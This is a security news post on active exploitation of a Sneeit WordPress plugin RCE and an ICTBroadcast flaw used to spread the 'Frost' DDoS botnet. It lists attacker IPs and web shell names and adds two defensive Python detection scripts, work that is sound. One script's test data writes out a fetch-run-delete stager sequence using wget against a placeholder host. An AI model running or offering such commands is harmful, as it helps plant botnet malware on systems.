Cyber Web Spider Blog – News

Sneeit WordPress RCE Exploited in the Wild While ICTBroadcast Bug Fuels Frost Botnet Attacks

Posted on December 8, 2025 By CWS

A critical security flaw in the Sneeit Framework plugin for WordPress is being actively exploited in the wild, according to data from Wordfence.
The remote code execution vulnerability in question is CVE-2025-6389 (CVSS score: 9.8), which affects all versions of the plugin prior to and including 8.3. It has been patched in version 8.4, released on August 5, 2025. The plugin has more than 1,700 active installations.
"This is due to the [sneeit_articles_pagination_callback()] function accepting user input and then passing it through call_user_func()," Wordfence said. "This makes it possible for unauthenticated attackers to execute code on the server, which can be leveraged to inject backdoors or, for example, create new administrative user accounts."
In other words, the vulnerability can be leveraged to call an arbitrary PHP function, such as wp_insert_user(), to insert a malicious administrator user, which an attacker can then weaponize to seize control of the site and inject malicious code that redirects site visitors to other sketchy sites, malware, or spam.
Wordfence said in-the-wild exploitation commenced on November 24, 2025, the same day it was publicly disclosed, with the company blocking over 131,000 attempts targeting the flaw. Of those, 15,381 attack attempts were recorded over the past 24 hours alone.

Some of the efforts include sending specially crafted HTTP requests to the "/wp-admin/admin-ajax.php" endpoint to create a malicious admin user account like "arudikadis" and upload a malicious PHP file "tijtewmg.php" that likely grants backdoor access.
The attacks have originated from the following IP addresses –

185.125.50[.]59
182.8.226[.]51
89.187.175[.]80
194.104.147[.]192
196.251.100[.]39
114.10.116[.]226
116.234.108[.]143

The WordPress security company said it also observed malicious PHP files that include capabilities to scan directories, read, edit, or delete files and their permissions, and allow for the extraction of ZIP files. These PHP files go by the names "xL.php," "Canonical.php," ".a.php," and "easy.php."
The "xL.php" shell, per Wordfence, is downloaded by another PHP file called "up_sf.php" that is designed to exploit the vulnerability. It also downloads an ".htaccess" file from an external server ("racoonlab[.]top") onto the compromised host.

"This .htaccess file ensures that access to files with certain file extensions is granted on Apache servers," István Márton said. "This is useful in cases where other .htaccess files restrict access to scripts, for example, in upload directories."
ICTBroadcast Flaw Exploited to Deliver "Frost" DDoS Botnet
The disclosure comes as VulnCheck said it observed fresh attacks exploiting a critical ICTBroadcast flaw (CVE-2025-2611, CVSS score: 9.3) against its honeypot systems to download a shell script stager, which in turn fetches several architecture-specific versions of a binary called "frost."
Each of the downloaded versions is executed, followed by the deletion of the payloads and the stager itself to cover up traces of the activity. The end goal of the activity is to carry out distributed denial-of-service (DDoS) attacks against targets of interest.
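As an added example (not code from the report or from Wordfence), the Python script below turns the indicators above into a triage pass over web-server access logs: it refangs the listed IPs, flags any request for the named PHP files, and flags POSTs to admin-ajax.php only when they come from a listed IP. The log lines are constructed for the example, and the function names and the 198.51.100.x / 203.0.113.x documentation-range addresses are assumptions, not part of the report.

```python
import ipaddress
import re

# Indicators from the Wordfence report quoted above, kept defanged as the page prints them.
SNEEIT_SOURCE_IPS = [
    "185.125.50[.]59", "182.8.226[.]51", "89.187.175[.]80", "194.104.147[.]192",
    "196.251.100[.]39", "114.10.116[.]226", "116.234.108[.]143",
]
# File names tied to the campaign: the uploaded backdoor, the exploit helper and the web shells.
SNEEIT_FILE_NAMES = {"tijtewmg.php", "up_sf.php", "xL.php", "Canonical.php", ".a.php", "easy.php"}
# Endpoint the exploitation requests are sent to.
AJAX_ENDPOINT = "/wp-admin/admin-ajax.php"


def refang(indicator: str) -> str:
    """Turn a defanged '1.2.3[.]4' indicator into a validated address string."""
    return str(ipaddress.ip_address(indicator.replace("[.]", ".")))


KNOWN_IPS = {refang(ip) for ip in SNEEIT_SOURCE_IPS}

# Combined log format: ip ident user [time] "METHOD path PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def triage_line(line: str):
    """Return a dict describing the request and its indicator hits, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m["path"].split("?", 1)[0]          # drop the query string
    basename = path.rsplit("/", 1)[-1]
    hits = []
    # A request for any of the dropped file names is suspicious from any source.
    if basename in SNEEIT_FILE_NAMES:
        hits.append(f"dropped-file:{basename}")
    if m["ip"] in KNOWN_IPS:
        hits.append("known-source-ip")
        # POSTs to admin-ajax.php are normal WordPress traffic; flag them only from listed IPs.
        if m["method"] == "POST" and path == AJAX_ENDPOINT:
            hits.append("admin-ajax-post-from-known-ip")
    return {"ip": m["ip"], "method": m["method"], "path": path,
            "status": int(m["status"]), "hits": hits}


def triage_log(lines):
    """Keep only the parsed entries that matched at least one indicator."""
    results = (triage_line(line) for line in lines)
    return [r for r in results if r and r["hits"]]


# Constructed sample log lines (not from the report).
SAMPLE_LOG = [
    '185.125.50.59 - - [24/Nov/2025:10:15:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [24/Nov/2025:10:16:44 +0000] "GET /wp-content/uploads/tijtewmg.php HTTP/1.1" 200 77 "-" "curl/8.0"',
    '198.51.100.7 - - [24/Nov/2025:10:17:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [24/Nov/2025:10:17:09 +0000] "GET /index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '89.187.175.80 - - [24/Nov/2025:10:20:30 +0000] "GET /xL.php HTTP/1.1" 404 196 "-" "python-requests/2.31"',
]

if __name__ == "__main__":
    for hit in triage_log(SAMPLE_LOG):
        print(hit["ip"], hit["method"], hit["path"], hit["status"], ", ".join(hit["hits"]))
```

Treating every admin-ajax.php POST as suspicious would bury the hits in normal WordPress traffic, so the example uses those POSTs only to corroborate a listed source IP. A request for one of the dropped file names is flagged regardless of source: a 200 on such a path means the backdoor is live, and a 404 still shows someone probing for it.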

"The 'frost' binary combines DDoS tooling with spreader logic that includes fourteen exploits for fifteen CVEs," VulnCheck's Jacob Baines said. "The important part is how it spreads. The operator isn't carpet bombing the internet with exploits. 'Frost' checks the target first and only proceeds with exploitation when it sees the exact indicators it expects."
For instance, the binary exploits CVE-2025-1610 only after receiving an HTTP response that contains "Set-Cookie: user=(null)" and then a follow-on response to a second request that contains "Set-Cookie: user=admin." If these markers aren't present, the binary stays dormant and does nothing. The attacks are launched from the IP address 87.121.84[.]52.
While the identified vulnerabilities have been exploited by various DDoS botnets, evidence points to the latest attacks being a small, targeted operation, given that there are fewer than 10,000 internet-exposed systems that are susceptible to them.
"This limits how large a botnet built on these CVEs can get, which makes this operator a relatively small player," Baines said. "Notably, the ICTBroadcast exploit that delivered this sample doesn't appear in the binary, which indicates the operator has more capabilities not seen here."
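As an added example, not part of VulnCheck's analysis or the article, the Python below scores a shell session's command history for the stager behaviour described above: several architecture-specific variants of one file fetched, each executed, then the payloads and the script itself removed. The command lines are constructed telemetry (the host 198.51.100.23 is a documentation address), and the architecture suffix list, the weights and the threshold are assumptions chosen for the example.

```python
import re
from collections import defaultdict

# Architecture suffixes commonly seen on multi-arch embedded payload builds (assumed list),
# sorted longest first so 'x86_64' wins over 'x86' and 'mipsel' over 'mips'.
ARCH_TAGS = sorted(
    ["x86", "x86_64", "i686", "i586", "arm", "arm5", "arm6", "arm7", "aarch64",
     "mips", "mipsel", "mips64", "ppc", "sh4", "m68k", "sparc"],
    key=len, reverse=True,
)
ARCH_NAME_RE = re.compile(r"^(?P<stem>[A-Za-z0-9_-]+?)[._-](?P<arch>" + "|".join(ARCH_TAGS) + r")$")
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
STAGER_THRESHOLD = 5   # assumed cut-off for the example


def _basename(token: str) -> str:
    return token.rsplit("/", 1)[-1]


def analyse_session(cmdlines):
    """Score one session's command lines for fetch-all-archs / run-each / clean-up behaviour."""
    downloads = defaultdict(set)          # stem -> architecture tags fetched for it
    fetched, executed, deleted = set(), set(), set()
    script_deleted = False
    for cmd in cmdlines:
        argv = cmd.split()
        if not argv:
            continue
        prog = _basename(argv[0])
        if prog in DOWNLOADERS:
            # Any argument whose file name ends in an architecture tag counts as a fetched variant.
            for tok in argv[1:]:
                name = _basename(tok)
                m = ARCH_NAME_RE.match(name)
                if m:
                    downloads[m["stem"]].add(m["arch"])
                    fetched.add(name)
        elif prog == "rm":
            for tok in argv[1:]:
                if tok.startswith("-"):
                    continue
                name = _basename(tok)
                deleted.add(name)
                # Telemetry usually records the expanded $0; a .sh name is the common case.
                if tok == "$0" or name.endswith(".sh"):
                    script_deleted = True
        elif ARCH_NAME_RE.match(prog):
            executed.add(prog)

    reasons, score = [], 0
    multi_arch = {stem: sorted(archs) for stem, archs in downloads.items() if len(archs) >= 3}
    if multi_arch:
        score += 3
        reasons.append("multiple architecture variants of one file fetched: " + ", ".join(multi_arch))
    if executed & fetched:
        score += 2
        reasons.append("fetched variants were executed")
    if deleted & fetched:
        score += 2
        reasons.append("fetched variants were deleted afterwards")
    if script_deleted:
        score += 1
        reasons.append("script removed itself")
    return {"score": score, "stager_like": score >= STAGER_THRESHOLD,
            "multi_arch": multi_arch, "reasons": reasons}


# Constructed command telemetry for three sessions (not captured data).
FROST_LIKE_SESSION = [
    "cd /tmp",
    "wget http://198.51.100.23/frost.x86",
    "wget http://198.51.100.23/frost.arm7",
    "wget http://198.51.100.23/frost.mips",
    "wget http://198.51.100.23/frost.mipsel",
    "chmod +x frost.x86 frost.arm7 frost.mips frost.mipsel",
    "./frost.x86", "./frost.arm7", "./frost.mips", "./frost.mipsel",
    "rm -f frost.x86 frost.arm7 frost.mips frost.mipsel",
    "rm -f stager.sh",
]
SINGLE_ARCH_INSTALL = [
    "curl -O https://example.org/dl/tool-x86_64",
    "chmod +x tool-x86_64",
    "./tool-x86_64 --version",
    "rm -f tool-x86_64",
]
BENIGN_SESSION = [
    "wget https://example.org/tool-1.2.tar.gz",
    "tar xzf tool-1.2.tar.gz",
    "./configure",
    "rm -f tool-1.2.tar.gz",
]

if __name__ == "__main__":
    for label, session in [("frost-like", FROST_LIKE_SESSION),
                           ("single-arch", SINGLE_ARCH_INSTALL), ("benign", BENIGN_SESSION)]:
        verdict = analyse_session(session)
        print(label, verdict["score"], verdict["stager_like"], verdict["reasons"])
```

A single static binary that is downloaded, run and cleaned up scores below the threshold, which is why the multi-architecture fetch carries the most weight: a legitimate install pulls the one build that matches the host, while a spreader that does not yet know the victim's CPU pulls every build and lets the wrong ones fail.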

Source: The Hacker News. Tags: Attacks, Botnet, Bug, Exploited, Frost, Fuels, ICTBroadcast, RCE, Sneeit, Wild, WordPress

Copyright © 2025 Cyber Web Spider Blog – News.